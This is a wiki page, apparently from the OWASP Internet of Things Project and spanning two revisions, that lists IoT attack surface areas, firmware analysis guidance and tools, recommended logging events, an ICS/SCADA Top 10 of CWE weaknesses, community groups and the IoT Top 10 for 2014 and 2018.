** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246186OWASP Internet of Things Project2018-12-19T23:54:34Z<p>Aaron.guzman: /* Contributors */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
Vishruta Rudresh<br />
<br />
Vijayamurugan Pushpanathan <br />
<br />
Aaron Guzman <br />
<br />
Alexander Lafrenz <br />
<br />
Masahiro Murashima <br />
<br />
Charlie Worrell <br />
<br />
José A. Rivas (jarv) <br />
<br />
Pablo Endres <br />
<br />
Ade Yoseman <br />
<br />
Cédric LEVY-BENCHEOTN<br />
<br />
Jason Andress<br />
<br />
Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
